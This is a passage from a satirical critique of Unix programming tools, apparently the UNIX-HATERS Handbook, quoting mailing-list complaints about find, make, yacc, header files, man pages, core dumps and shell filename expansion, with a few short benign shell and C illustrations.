I just figured out why the "find" program isn't working for me anymore. It turns out that in this brave new world of NFS and symbolic links, "find" is becoming worthless. The so-called file system we have here is a grand spaghetti pile combining several different fileservers with lots and lots of symbolic links hither and thither, none of which the program bothers to follow up on. There isn't even a switch to request this… the net effect is that enormous chunks of the search space are silently excluded. I finally realized this when my request to search a fairly sizeable directory turned up nothing (not entirely surprising, but it did nothing too fast) and investigation finally revealed that the directory was a symbolic link to some other place.

I have relied on it for a long time to avoid spending hours fruitlessly wandering up and down byzantine directory hierarchies in search of the source for a program that I know exists somewhere (a different place on each machine, of course).
I don't want to have to check out every directory in the tree I give to find—that should be find's job, dammit. I don't want to use Unix. I don't want to mung the system software every time misfeatures like this come up. I don't want to waste my time fighting SUN or the entire universe of Unix weeniedom.

Hate, hate, hate, hate, hate, hate, hate.

—Ken (feeling slightly better but still pissed)

Writing a complicated shell script that actually does something with the files that are found produces strange results, a sad result of the shell's method for passing arguments to commands.

Date: Sat, 12 Dec 92 01:15:52 PST
From: Jamie Zawinski <jwz@lucid.com>
Subject: Q: what's the opposite of 'find?' A: 'lose.'
To: UNIX-HATERS

I wanted to find all .el files in a directory tree that didn't have a corresponding .elc file. That should be easy. I tried to use find. What was I thinking.

First I tried:

    % find . -name '*.el' -exec 'test -f {}c'
    find: incomplete statement

Oh yeah, I remember, it wants a semicolon.

    % find . -name '*.el' -exec 'test -f {}c' \;
    find: Can't execute test -f {}c: No such file or directory

Oh, great. It's not tokenizing that command like most other things do.

    % find . -name '*.el' -exec test -f {}c \;

Well, that wasn't doing anything…

    % find . -name '*.el' -exec echo test -f {}c \;
    test -f c
    test -f c
    test -f c
    test -f c
Hmm. OK, let's see.

    % find . -name '*.el' -exec echo test -f '{}'c \;
    test -f {}c
    test -f {}c
    test -f {}c
    test -f {}c

Huh? Maybe I'm misremembering, and {} isn't really the magic "substitute this file name" token that find uses. Or maybe…

    % find . -name '*.el' -exec echo test -f '{}' c \;
    test -f ./bytecomp/bytecomp-runtime.el c
    test -f ./bytecomp/disass.el c
    test -f ./bytecomp/bytecomp.el c
    test -f ./bytecomp/byte-optimize.el c

Oh, great. The shell thinks curly brackets are expendable. Now what? Let's see, I could use "sed…"

Now at this point I should have remembered that profound truism: "Some people, when confronted with a Unix problem, think 'I know, I'll use sed.' Now they have two problems."

Five tries and two searches through the sed man page later, I had come up with:

    % echo foo.el | sed 's/$/c/'
    foo.elc

and then:

    % find . -name '*.el' \
        -exec echo test -f `echo '{}' | sed 's/$/c/'` \;
    test -f c
    test -f c
    test -f c
    % find . -name '*.el' \
        -exec echo test -f "`echo '{}' | sed 's/$/c/'`" \;
    Variable syntax.

    % find . -name '*.el' \
        -exec echo test -f '`echo "{}" | sed "s/$/c/"`' \;
    test -f `echo "{}" | sed "s/$/c/"`
    test -f `echo "{}" | sed "s/$/c/"`
    test -f `echo "{}" | sed "s/$/c/"`
Hey, that last one was kind of close. Let's run through the rest of the shell-quoting permutations until we find one that works.

    % find . -name '*.el' \
        -exec echo test -f '`echo {} | sed "s/$/c/"`' \;
    test -f `echo {} | sed "s/$/c/"`
    test -f `echo {} | sed "s/$/c/"`
    test -f `echo {} | sed "s/$/c/"`

No, wait. That backquoted form is one token. Look, there are spaces around it. Maybe I could filter the backquoted form through sed. Um. What do you want, the blood of a goat spilt under a full moon?

So then I spent half a minute trying to figure out how to do something that involved "-exec sh -c …", and then I finally saw the light, and wrote some emacs-lisp code to do it. It was easy. It was fast. It worked. I was happy. I thought it was over.

But then in the shower this morning I thought of a way to do it. It had the same attraction that the Scribe implementation of Towers of Hanoi has, preying on my morbid fascination. I tried and tried, but I couldn't stop myself; the perversity of the task had pulled me in. It only took me 12 tries to get it right. It only spawns two processes per file in the directory tree we're iterating over. It's the Unix Way!

    % find . -name '*.el' -print \
        | sed 's/^/FOO=/' \
        | sed 's/$/; if [ ! -f ${FOO}c ]; then echo $FOO; fi/' \
        | sh

BWAAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH!!!!

—Jamie
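For the record, both gripes eventually got answers, though neither correspondent had them handy at the time: POSIX find grew a -L flag for following symbolic links (older finds spell it -follow), and the "-exec sh -c …" route Jamie gave up on does work, because sh gets the file name as a positional parameter instead of having it spliced into quoted text. A sketch, with invented file names:

```shell
#!/bin/sh
# Build a scratch tree: one .el with its .elc, one without, plus a
# symlinked directory that plain find refuses to descend into.
tmp=$(mktemp -d)
mkdir "$tmp/real"
ln -s "$tmp/real" "$tmp/link"
cd "$tmp/real"
touch straggler.el compiled.el compiled.elc

# Jamie's problem: .el files lacking a corresponding .elc.
# sh receives each name as $1, so no quoting gymnastics are needed.
find . -name '*.el' -exec sh -c 'test -f "$1"c || echo "$1"' sh {} \;
# prints only ./straggler.el

# Ken's problem: symlinks.
find "$tmp/link" -name '*.el'      # prints nothing
find -L "$tmp/link" -name '*.el'   # prints both .el files

cd /
rm -rf "$tmp"
```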
9 Programming

Hold Still, This Won't Hurt a Bit

"Do not meddle in the affairs of Unix, for it is subtle and quick to core dump."

—Anonymous

If you learned about programming by writing C on a Unix box, then you may find this chapter a little mind-bending at first. The sad fact is that Unix has so completely taken over the worldwide computer science educational establishment that few of today's students realize that Unix's blunders are not, in fact, sound design decisions.

For example, one Unix lover made the following statement when defending Unix and C against our claims that there are far more powerful languages than C and that these languages come with much more powerful and productive programming environments than Unix provides:

Date: 1991 Nov 9
From: tmb@ai.mit.edu (Thomas M. Breuel)

It is true that languages like Scheme, Smalltalk, and Common Lisp come with powerful programming environments.
However, the Unix kernels, shell, and C language taken together address some large-scale issues that are not handled well (or are often not even addressed) in those languages and environments. Examples of such large-scale issues are certain aspects of memory management and locality (through process creation and exit), persistency (using files as data structures), parallelism (by means of pipes, processes, and IPC), protection and recovery (through separate address spaces), and human editable data representations (text). From a practical point of view, these are handled quite well in the Unix environment.

Thomas Breuel credits Unix with one approach to solving the complicated problems of computer science. Fortunately, this is not the approach that other sciences have used for solving problems posed by the human condition.

Date: Tue, 12 Nov 91 11:36:04 -0500
From: markf@altdorf.ai.mit.edu
To: UNIX-HATERS
Subject: Random Unix similes

Treating memory management through process creation and exit is like medicine treating illness through living and dying. It is ignoring the problem.

Having Unix files (i.e., the Bag O' Bytes) be your sole interface to persistency is like throwing everything you own into your closet and hoping that you can find what you want when you need it (which, unfortunately, is what I do).

Parallelism through pipes, processes, and IPC? Unix process overhead is so high that this is not a significant source of parallelism. It is like an employer solving a personnel shortage by asking his employees to have more children.

Unix can sure handle text. Yep. It can also handle text. Oh, by the way, did I mention that Unix is good at handling text?

—Mark
The Wonderful Unix Programming Environment

The Unix zealots make much of the Unix "programming environment." They claim Unix has a rich set of tools that makes programming easier. Here's what Kernighan and Mashey have to say about it in their seminal article, "The Unix Programming Environment":

    One of the most productive aspects of the Unix environment is its
    provision of a rich set of small, generally useful programs—tools—
    for helping with day-to-day programming tasks. The programs shown
    below are among the more useful. We will use them to illustrate
    other points in later sections of the article.

        wc files             Count lines, words, and characters in files.
        pr files             Print files with headings, multiple columns, etc.
        lpr files            Spool files onto line printer.
        grep pattern files   Print all lines containing pattern.

    Much of any programmer's work is merely running these and related
    programs. For example,

        wc *.c

    counts a set of C source files;

        grep goto *.c

    finds all the GOTOs.

These are "among the most useful"?!?! Yep. That's what much of this programmer's work consists of. In fact, today I spent so much time counting my C files that I didn't really have time to do anything else. I think I'll go count them again.

Another article in the same issue of IEEE Computer is "The Interlisp Programming Environment" by Warren Teitelman and Larry Masinter. Interlisp is a very sophisticated programming environment. In 1981, Interlisp had tools that in 1994 Unix programmers can only salivate while thinking about.
The designers of the Interlisp environment had a completely different approach. They decided to develop large, sophisticated tools that took a long time to learn how to use. The payoff for investing the time to use the tools would be that the programmer who learned the tools would be more productive for it. That seems reasonable.

Sadly, few programmers of today's machines know what it is like to use such an environment, in all its glory.

Programming in Plato's Cave

    I got the impression that the objective [of computer language design and tool development] was to lift everyone to the highest productivity level, not the lowest or median.

    This has not been true of other industries that have become extensively automated. When people walk into a modern automated fast-food restaurant, they expect consistency, not haute cuisine. Consistent mediocrity, delivered on a large scale, is much more profitable than anything on a small scale, no matter how efficient it might be.

    —Response to the netnews message by a member of the technical staff of an unnamed company¹

Unix is not the world's best software environment—it is not even a good one. The Unix programming tools are meager and hard to use; most PC debuggers put most Unix debuggers to shame; interpreters remain the play toy of the very rich; and change logs and audit trails are recorded at the whim of the person being audited. Yet somehow Unix maintains its reputation as a programmer's dream. Maybe it lets programmers dream about being productive, rather than letting them actually be productive.

¹This person wrote to us saying: "Apparently a message I posted on comp.lang.c++ was relayed to the UNIX-HATERS mailing list. If I had known that, I would not have posted it in the first place. I definitely do not want my name, or anything I have written, associated with anything with the title 'UNIX-HATERS.' The risk that people will misuse it is just too large.… You may use the quote, but not my name or affiliation." —From a posting to comp.lang.c++
Unix programmers are like mathematicians. It's a curious phenomenon we call "Programming by Implication." Discussing with a Unix programmer how useful a program-cross-referencing utility would be, he agreed, noted that "You could write a program like that," and that this utility could be easily implemented by writing a number of small utility programs and then piping them together.

To be fair, the reason he said "You could write a program like that" instead of actually writing the program is that some properties of the C language and the Unix "Programming Environment" combine synergistically to make writing such a utility a pain of epic proportion.

You may think we exaggerate, but we're not.

Parsing with yacc

    "Yacc" was what I felt like doing after I learned how to use yacc(1).
    —Anonymous

"YACC" stands for Yet Another Compiler Compiler. It takes a context-free grammar describing a language to be parsed and computes a state machine for a universal pushdown automaton. When the state machine is run, one gets a parser for the language. The theory is well understood since one of the big research problems in the olden days of computer science was reducing the time it took to write compilers.

This scheme has one small problem: most programming languages are not context-free. Thus, yacc users must specify code fragments to be run at certain state transitions to handle the cases where context-free grammars blow up. (Type checking is usually done this way.) Most C compilers today have a yacc-generated parser; for example, the yacc grammar for GCC 2.1 (an otherwise fine compiler written by the Free Software Foundation) is about 1650 lines long. The actual code output by yacc and the code for the universal pushdown automaton that runs the yacc output are much larger.

Some programming languages are easier to parse. Lisp, for example, can be parsed by a recursive-descent parser. "Recursive-descent" is computer jargon for "simple enough to write on a liter of Coke."
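The "liter of Coke" claim is easy to believe. Below is a hedged toy sketch in C of a recursive-descent reader for s-expressions; it merely counts atoms and checks that parentheses balance. The names (count_atoms, sexp_count) are ours, and this is an illustration, not the authors' 250-line parser.

```c
#include <assert.h>
#include <stdio.h>

static const char *p;           /* cursor into the input string */

/* Parse one expression at *p; return its atom count, or -1 on error. */
static int sexp_count(void)
{
    while (*p == ' ') p++;
    if (*p == '(') {
        p++;                    /* consume '(' */
        int total = 0;
        while (*p && *p != ')') {
            int n = sexp_count();       /* recurse on each element */
            if (n < 0) return -1;
            total += n;
            while (*p == ' ') p++;
        }
        if (*p != ')') return -1;       /* unbalanced parentheses */
        p++;                    /* consume ')' */
        return total;
    } else if (*p && *p != ')') {
        /* an atom: skip to the next delimiter */
        while (*p && *p != ' ' && *p != '(' && *p != ')') p++;
        return 1;
    }
    return -1;                  /* empty input or stray ')' */
}

int count_atoms(const char *s) { p = s; return sexp_count(); }
```

A parser like this recognizes Lisp's entire surface syntax; the equivalent job for C, as the next paragraphs note, is a different order of undertaking.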
As an experiment, we wrote a recursive-descent parser for Lisp. It took about 250 lines of C. If the parser had been written in Lisp, it would not have even filled a page.

The olden days mentioned above were just around the time that the editors of this book were born. Dinosaurs ruled the machine room and Real Men programmed with switches on the front panel. Today, sociologists and historians are unable to determine why the seemingly rational programmers of the time designed, implemented, and disseminated languages that were so hard to parse. Perhaps they needed open research problems, and writing parsers for these hard-to-parse languages seemed like a good one. It kind of makes you wonder what kinds of drugs they were doing back in the olden days.

A program to parse C programs and figure out which functions call which functions and where global variables are read and modified is the equivalent of a C compiler front end. C compiler front ends are complex artifacts; the complexity of the C language and the difficulty of using tools like yacc make them that way. No wonder nobody is rushing to write this program.

Die-hard Unix aficionados would say that you don't need this program since grep is a perfectly good solution. Plus, you can use grep in shell pipelines. Well, the other day we were looking for all uses of the min function in some BSD kernel code. Here's an example of what we got:

    % grep min netinet/ip_icmp.c
    icmplen = oiplen + min(8, oip->ip_len);
     * that not corrupted and of at least minimum length.
     * If the incoming packet was addressed directly to us,
     * to the incoming interface.
     * Retrieve any source routing from the incoming packet;
    %

Yep, grep finds all of the occurrences of min, and then some.

"Don't know how to make love. Stop."

The ideal programming tool should be quick and easy to use for common tasks and, at the same time, powerful enough to handle tasks beyond that for which it was intended. Unfortunately, in their zeal to be general, many Unix tools forget about the quick and easy part.

Make is one such tool. In abstract terms, make's input is a description of a dependency graph. Each node of the dependency graph contains a set of commands to be run when that node is out of date with respect to the nodes that it depends on. Nodes correspond to files, and the file dates determine
whether the files are out of date with respect to each other. A small dependency graph, or Makefile, is shown below:

    program: source1.o source2.o
            cc -o program source1.o source2.o

    source1.o: source1.c
            cc -c source1.c

    source2.o: source2.c
            cc -c source2.c

In this graph, the nodes are program, source1.o, source2.o, source1.c, and source2.c. The node program depends on the source1.o and source2.o nodes.

[figure: graphical representation of the same Makefile as a dependency graph]

When either source1.o or source2.o is newer than program, make will regenerate program by executing the command cc -o program source1.o source2.o. And, of course, if source1.c has been modified, then both source1.o and program will be out of date, necessitating a recompile and a relink.

While make's model is quite general, the designers forgot to make it easy to use for common cases. In fact, very few novice Unix programmers know exactly how utterly easy it is to screw yourself to a wall with make, until they do it.

To continue with our example, let's say that our programmer, call him Dennis, is trying to find a bug in source1.c and therefore wants to compile this file with debugging information included. He modifies the Makefile to look like this:
    program: source1.o source2.o
            cc -o program source1.o source2.o

    # I'm debugging source1.c  -Dennis
    source1.o: source1.c
            cc -c -g source1.c

    source2.o: source2.c
            cc -c source2.c

The line beginning with "#" is a comment. The make program ignores them. Well, when poor Dennis runs make, the program complains:

    Make: Makefile: Must be a separator on line 4. Stop

And then make quits. He stares at his Makefile for several minutes, then several hours, but can't quite figure out what's wrong with it. He thinks there might be something wrong with the comment line, but he is not sure.

The problem with Dennis's Makefile is that when he added the comment line, he inadvertently inserted a space before the tab character at the beginning of line 2. The tab character is a very important part of the syntax of Makefiles. All command lines (the lines beginning with cc in our example) must start with tabs. After he made his change, line 2 didn't, hence the error.

"So what?" you ask. "What's wrong with that?"

There is nothing wrong with it, by itself. It's just that when you consider how other programming tools work in Unix, using tabs as part of the syntax is like one of those pungee stick traps in The Green Berets: the poor kid from Kansas is walking point in front of John Wayne and doesn't see the trip wire. After all, there are no trip wires to watch out for in Kansas corn fields. WHAM!

You see, the tab character, along with the space character and the newline character, are commonly known as whitespace characters. Whitespace is a technical term which means "you should just ignore them," and most programs do. Most programs treat spaces and tabs the same way. Except make (and cu and uucp and a few other programs). And now there's nothing left to do with the poor kid from Kansas but shoot him in the head to put him out of his misery.
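The trap Dennis fell into is mechanical enough that you could lint for it. The hypothetical checker below flags a line that looks like a command line but begins with spaces rather than a tab; it is our own illustration of the whitespace rule, not what make actually does internally.

```c
#include <assert.h>

/* Returns 1 if a Makefile line will trigger the "Must be a separator"
 * trap: leading spaces where a command line's tab should be.
 * suspicious_command_line is an invented name for this sketch. */
static int suspicious_command_line(const char *line)
{
    if (line[0] == '\t')
        return 0;                   /* a proper command line */
    if (line[0] == ' ') {
        /* skip the spaces; anything left (even a tab) means trouble */
        while (*line == ' ') line++;
        return *line != '\0' && *line != '\n';
    }
    return 0;                       /* rule, macro, or comment line */
}
```

Run over Dennis's edited Makefile, the checker would have flagged line 2 immediately; make, of course, just says "Stop."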
Dennis never found the problem with his Makefile. He's now stuck in a dead-end job where he has to wear a paper hat and maintains the sendmail configuration files for a large state university in the midwest. It's a damn shame.

Header Files

C has these things called header files. They are files of definitions that are included in source files at compilation time. Like most things in Unix, they work reasonably well when there are one or two of them but quickly become unwieldy when you try to do anything serious.

It is frequently difficult to calculate which header files to include in your source file. Header files are included by using the C preprocessor #include directive. This directive has two syntaxes:

    #include <header1.h>

and:

    #include "header2.h"

The difference between these two syntaxes is implementation dependent. This basically means that the implementation is free to do whatever the hell it wants.

Let's say that Dennis has a friend named Joey who is also a novice Unix programmer. Joey has a C program named foo.c that has some data structure definitions in foo.h, which lives in the same directory. Now, you probably know that "foo" is a popular name among computer programmers. It turns out that the systems programmer for Joey's machine also made a file named foo.h and stored it in the default include file directory, /usr/include.

Poor Joey goes to compile his foo.c program and is surprised to see multiple syntax errors. He is puzzled since the compiler generates a syntax error every time he mentions any of the data structures defined in foo.h. But the definitions in foo.h look okay.

You and I probably know that Joey probably has:

    #include <foo.h>

in his C file instead of:

    #include "foo.h"
but Joey doesn't know that. Or maybe he is using quotes but is using a compiler with slightly different search rules for include files. The point is that Joey is hosed, and it's probably not his fault.

Having a large number of header files is a big pain. Header files typically define data structures, and many header files depend on data structures defined in other header files. You, as the programmer, get the wonderful job of sorting out these dependencies and including the header files in the right order.

Of course, the compiler will help you. If you get the order wrong, the compiler will testily inform you that you have a syntax error. The compiler is a busy and important program and doesn't have time to figure out the difference between a missing data structure definition and a plain old mistyped word. In fact, if you make even a small omission, like a single semicolon, a C compiler tends to get so confused and annoyed that it bursts into tears and complains that it just can't compile the rest of the file since the one missing semicolon has thrown it off so much. The poor compiler just can't concentrate on the rest.

In the compiler community, this phenomenon is known as "cascade errors," which is compiler jargon for "I've fallen and I can't get up." The missing semicolon has thrown the compiler's parser out of sync with respect to the program text. The compiler probably has such a hard time with syntax errors because it's based on yacc, which is a great tool for producing parsers for syntactically correct programs (the infrequent case), but a horrible tool for producing robust, error-detecting and -correcting parsers. Experienced C programmers know to ignore all but the first parse error from a compiler.

Utility Programs and Man Pages

Unix utilities are self-contained; each is free to interpret its command-line arguments as it sees fit. This freedom is annoying; instead of being able to learn a single set of conventions for command line arguments, you have to read a man page for each program to figure out how to use it.

It's a good thing the man pages are so well written.

Take the following example. The "SYNOPSIS" sums it up nicely, don't you think?
    LS(1)            Unix Programmer's Manual            LS(1)

    NAME
         ls - list contents of directory

    SYNOPSIS
         ls [ -acdfgilqrstu1ACLFR ] name ...

    DESCRIPTION
         For each directory argument, ls lists the contents of
         the directory; for each file argument, ls repeats its
         name and any other information requested. By default,
         the output is sorted alphabetically. When no argument
         is given, the current directory is listed. When several
         arguments are given, the arguments are first sorted
         appropriately, but file arguments are processed before
         directories and their contents. There are a large
         number of options: [...]

    BUGS
         Newline and tab are considered printing characters in
         file names.

         The output device is assumed to be 80 columns wide.

         The option setting based on whether the output is a
         teletype is undesirable as "ls -s" is much different
         than "ls -s | lpr". On the other hand, not doing this
         setting would make old shell scripts which used ls
         almost certain losers.

A game that you can play while reading man pages is to look at the BUGS section and try to imagine how each bug could have come about. Take this example from the shell's man page:
    SH(1)            Unix Programmer's Manual            SH(1)

    NAME
         sh - command language

    SYNOPSIS
         sh [ -ceiknrstuvx ] [ arg ] ...

    DESCRIPTION
         Sh is a command programming language that executes
         commands read from a terminal or a file. See invocation
         for the meaning of arguments to the shell.
         [...]
         Special commands: :, ., break, case, cd, continue,
         eval, exec, exit, export, for, if, login, read,
         readonly, set, shift, times, trap, umask, wait, while
         [...]

    BUGS
         If << is used to provide standard input to an
         asynchronous process invoked by &, the shell gets mixed
         up about naming the input document. A garbage file
         /tmp/sh* is created, and the shell complains about not
         being able to find the file by another name.

We spent several minutes trying to understand this BUGS section, but we couldn't even figure out what the hell they were talking about. One Unix expert we showed this to remarked, "As I stared at it and scratched my head, it occurred to me that in the time it must have taken to track down the bug and write the BUGS entry, the programmer could have fixed the damn bug."

Unfortunately, fixing a bug isn't enough, because they keep coming back every time there is a new release of the OS. Way back in the early 1980s, before each of the bugs in Unix had such a large cult following, a programmer at BBN actually fixed the bug in Berkeley's make that requires starting rule lines with tab characters instead of any whitespace. It wasn't a hard fix—just a few lines of code.

Like any group of responsible citizens, the hackers at BBN sent the patch back to Berkeley so the fix could be incorporated into the master Unix sources. A year later, Berkeley released a new version of Unix with the make bug still there. The BBN hackers fixed the bug a second time, and once again sent the patch back to Berkeley.
…The third time that Berkeley released a version of make with the same bug present, the hackers at BBN gave up. Instead of fixing the bug in Berkeley make, they went through all of their Makefiles, found the lines that began with spaces, and turned the spaces into tabs. After all, BBN was paying them to write new programs, not to fix the same old bugs over and over again.

(According to legend, Stu Feldman didn't fix make's syntax, after he realized that the syntax was broken, because he already had 10 users.)

The Source Is the Documentation. Oh, Great!

    If it was hard to write, it should be hard to understand.
    —A Unix programmer

Back in the documentation chapter, we said that Unix programmers believe that the operating system's source code is the ultimate documentation. "After all," says one noted Unix historian, "the source is the documentation that the operating system itself looks to when it tries to figure out what to do next."

But trying to understand Unix by reading its source code is like trying to drive Ken Thompson's proverbial Unix car (the one with a single "?" on its dashboard) cross country.

The Unix kernel sources (in particular, the Berkeley Network Tape 2 sources available from ftp.uu.net) are mostly uncommented, do not skip any lines between "paragraphs" of code, use plenty of goto's, and generally try very hard to be unfriendly to people trying to understand them. As one hacker put it, "Reading the Unix kernel source is like walking down a dark alley. I suddenly stop and think 'Oh no, I'm about to be mugged.'"

Of course, the kernel sources have their own version of the warning light. Sprinkled throughout are little comments that look like this:

    /* XXX */

These mean that something is wrong. You should be able to figure out exactly what it is that's wrong in each case.
"It Can't Be a Bug, My Makefile Depends on It!"

The programmers at BBN were generally the exception. Most Unix programmers don't fix bugs: most don't have source code. Those with the code know that fixing bugs won't help. That's why when most Unix programmers encounter a bug, they simply program around it.

It's a sad state of affairs: if one is going to solve a problem, why not solve it once and for all instead of for a single case that will have to be repeated for each new program ad infinitum? Perhaps early Unix programmers were closet metaphysicians that believed in Nietzsche's doctrine of Eternal Recurrence.

There are two schools of debugging thought. One is the "debugger as physician" school, which was popularized in early ITS and Lisp systems. In these environments, the debugger is always present in the running program, and when the program crashes, the debugger/physician can diagnose the problem and make the program well again.

Unix follows the older "debugging as autopsy" model. In Unix, a broken program dies, leaving a core file that is like a dead body in more ways than one. A Unix debugger then comes along and determines the cause of death. Interestingly enough, Unix programs tend to die from curable diseases, accidents, and negligence, just as people do.

Dealing with the Core

After your program has written out a core file, your first task is to find it. This shouldn't be too difficult a task, because the core file is quite large—4, 8, and even 12 megabyte core files are not uncommon.

Core files are large because they contain almost everything you need to debug your program from the moment it died: stack, data, pointers to code… everything, in fact, except the program's dynamic state. If you were debugging a network program, by the time your core file is created, it's too late; the program's network connections are gone. As an added slap, any files it might have had opened are now closed.

Unfortunately, under Unix, it has to be that way. For instance, one cannot run a debugger as a command-interpreter or transfer control to a debugger when the operating system generates an exception. The only way to have a debugger take over from your program when it crashes is to run every program from your debugger.²
²Yes, under some versions of Unix you can attach a debugger to a running program, but you've still got to have a copy of the program with the symbols intact if you want to make any sense of it. If you want to debug interrupts, your debugger program must intercept every interrupt and forward the appropriate ones to your program. Can you imagine running an emacs with three context switches for every keystroke? Apparently, the idea of routine debugging is alien to the Unix philosophy.

Date:    Wed, 2 Jan 91 07:42:04 PST
From:    Michael Tiemann <cygint!tiemann@labrea.stanford.edu>
To:      UNIX-HATERS
Subject: Debuggers

Ever wonder why Unix debuggers are so lame? It's because if they had any functionality at all, they might have bugs, and if they had any bugs, they might dump core, and if they dump core, sploosh, there goes the core file from the application you were trying to debug. Sure would be nice if there was some way to let applications control how and when and where they dump core.

The Bug Reliquary

Unlike other operating systems, Unix enshrines its bugs as standard operating procedure. The most oft-cited reason that Unix bugs are not fixed is that such fixes would break existing programs. This is particularly ironic, considering that Unix programmers almost never consider upward compatibility when implementing new features.

Thinking about these issues, Michael Tiemann came up with 10 reasons why Unix debuggers overwrite the existing "core" file when they themselves dump core:

Date:    Thu, 17 Jan 91 10:28:11 PST
From:    Michael Tiemann <tiemann@cygnus.com>
To:      UNIX-HATERS
Subject: Unix debuggers

David Letterman's top 10 weenie answers are:

10. It would break existing code.
9. It would require a change to the documentation.
8. It's too hard to implement.
7. Why should the debugger do that? Why not write some "tool" that does it instead?
6. If the debugger dumps core, you should forget about debugging your application and debug the debugger.
5. It's too hard to understand.
4. Where are the Twinkies?
3. Why fix things now?
2. Unix can't do everything right.
1. What's the problem?

The statement "fixing bugs would break existing code" is a powerful excuse for Unix programmers who don't want to fix bugs. But there might be a hidden agenda as well. More than breaking existing code, fixing bugs would require changing the Unix interface that zealots consider so simple and easy-to-understand. That this interface doesn't work is irrelevant. But instead of buckling down and coming up with something better, Unix programmers chant the mantra that the Unix interface is Simple and Beautiful. Simple and Beautiful. Simple and Beautiful! (It's got a nice ring to it, doesn't it?)

Unfortunately, programming around bugs is particularly heinous since it makes the buggy behavior part of the operating system specification. The longer you wait to fix a bug, the harder it becomes, because countless programs that have the workaround now depend on the buggy behavior and will break if it is fixed. As a result, changing the operating system interface has an even higher cost since an unknown number of utility programs will need to be modified to handle the new, albeit correct, interface behavior. (This, in part, explains why programs like ls have so many different options to accomplish more-or-less the same thing.)

If you drop a frog into briskly boiling water, it will immediately jump out. Boiling water is hot, you know. However, if you put a frog into cold water and slowly bring it to a boil, the frog won't notice and will be boiled to death.

The Unix interface is boiling over. The complete programming interface to input/output used to be open, close, read, and write. The addition of networking was more fuel for the fire. Now there are at least five ways to send data on a file descriptor: write, writev, send, sendto, and sendmsg. Each involves a separate code path through the kernel, meaning there are five times as many opportunities for bugs and five different sets of performance characteristics to remember. The same holds true for reading data from a file descriptor (read, recv, recvfrom, and recvmsg). Dead frog.
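Two of those five send paths are easy to watch side by side on a socketpair: write() from the classic I/O interface and send() from the sockets era go through different kernel entry points but feed the same stream. A small POSIX sketch (demo is our name, not a standard routine):

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Push bytes through write() and send() on one end of a socketpair,
 * then read them all back from the other end. */
static int demo(char *out, size_t outlen)
{
    int fds[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, fds) != 0)
        return -1;
    write(fds[0], "via write;", 10);    /* the 1970s interface */
    send(fds[0], "via send", 8, 0);     /* the networking-era duplicate */

    size_t got = 0;
    while (got < 18) {                  /* drain all 18 bytes */
        ssize_t n = read(fds[1], out + got, outlen - 1 - got);
        if (n <= 0) break;
        got += (size_t)n;
    }
    out[got] = '\0';
    close(fds[0]);
    close(fds[1]);
    return 0;
}
```

Same bytes, same descriptor, two system calls; multiply by writev, sendto, and sendmsg for the full frog-boiling effect.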
Filename Expansion

There is one exception to Unix's each-program-is-self-contained rule: filename expansion. Very often, one wants Unix utilities to operate on one or more files. The Unix shells provide a shorthand for naming groups of files that are expanded by the shell, producing a list of files that is passed to the utility.

For example, say your directory contains the files A, B, and C. To remove all of these files, you might type rm *. The shell will expand "*" to "A B C" and pass these arguments to rm. There are many, many problems with this approach, which we discussed in the previous chapter. You should know, though, that using the shell to expand filenames is not an historical accident: it was a carefully reasoned design decision. In "The Unix Programming Environment" by Kernighan and Mashey (IEEE Computer, April 1981), the authors claim that, "Incorporating this mechanism into the shell is more efficient than duplicating it everywhere and ensures that it is available to programs in a uniform way."³

³Note that this decision flies in the face of the other lauded Unix decision to let any user run any shell. You can't run any shell: you have to run a shell that performs star-name expansion.

Excuse me? The Standard I/O library (stdio in Unix-speak) is "available to programs in a uniform way." What would have been wrong with having library functions to do filename expansion? Haven't these guys heard of linkable code libraries? Furthermore, the efficiency claim is completely vacuous since they don't present any performance numbers to back it up. They don't even explain what they mean by "efficient." Does having filename expansion in the shell produce the most efficient system for programmers to write small programs, or does it simply produce the most efficient system imaginable for deleting the files of untutored novices?

Most of the time, having the shell expand file names doesn't matter since the outcome is the same as if the utility program did it. But like most things in Unix, it sometimes bites. Hard.

Say you are a novice user with two files in a directory, A.m and B.m. You're used to MS-DOS and you want to rename the files to A.c and B.c. There's no rename command, but there's this mv command that looks like it does the same thing. So you type mv *.m *.c. The shell expands this to mv A.m B.m, and mv overwrites B.m with A.m. This is a bit of a shame since you had been working on B.m for the last couple of hours and that was your only copy.
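As it happens, the library function the authors ask about does exist on later systems: POSIX glob(3) expands patterns inside any program, no shell required. A hedged sketch (the scratch directory and the A.m/B.m file names are invented for the demo):

```c
#define _DEFAULT_SOURCE         /* for mkdtemp on glibc */
#include <assert.h>
#include <glob.h>
#include <stdio.h>
#include <stdlib.h>

/* Count how many existing files match a shell-style pattern. */
static size_t count_matches(const char *pattern)
{
    glob_t g;
    size_t n = 0;
    if (glob(pattern, 0, NULL, &g) == 0) {
        n = g.gl_pathc;             /* matches come back sorted */
        globfree(&g);
    }
    return n;                       /* 0 on no match or error */
}

/* Create scratch files A.m and B.m in a fresh temp directory;
 * writes the directory path into dirbuf. */
static int make_scratch(char *dirbuf, size_t len)
{
    snprintf(dirbuf, len, "/tmp/globdemoXXXXXX");
    if (!mkdtemp(dirbuf))
        return -1;
    const char *names[] = { "A.m", "B.m" };
    char path[512];
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", dirbuf, names[i]);
        FILE *f = fopen(path, "w");
        if (!f) return -1;
        fclose(f);
    }
    return 0;
}
```

A program using glob could notice that "*.c" matched nothing and refuse to proceed, which is exactly the check mv never gets the chance to make.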
Spend a few moments thinking about this problem and you can convince yourself that it is theoretically impossible to modify the Unix mv command so that it would have the functionality of the MS-DOS "rename" command.

So much for software tools.

Robustness, or "All Lines Are Shorter Than 80 Characters"

There is an amusing article in the December 1990 issue of Communications of the ACM entitled "An Empirical Study of the Reliability of Unix Utilities" by Miller, Fredriksen, and So. They fed random input to a number of Unix utility programs and found that they could make 24-33% (depending on which vendor's Unix was being tested) of the programs crash or hang. Occasionally the entire operating system panicked.

The whole article started out as a joke. One of the authors was trying to get work done over a noisy phone connection, and the line noise kept crashing various utility programs. He decided to do a more systematic investigation of this phenomenon.

Most of the bugs were due to a number of well-known idioms of the C programming language. In fact, much of the inherent brain damage in Unix can be attributed to the C language. Unix's kernel and all its utilities are written in C. The noted linguistic theorist Benjamin Whorf said that our language determines what concepts we can think. C has this effect on Unix; it prevents programmers from writing robust software by making such a thing unthinkable.

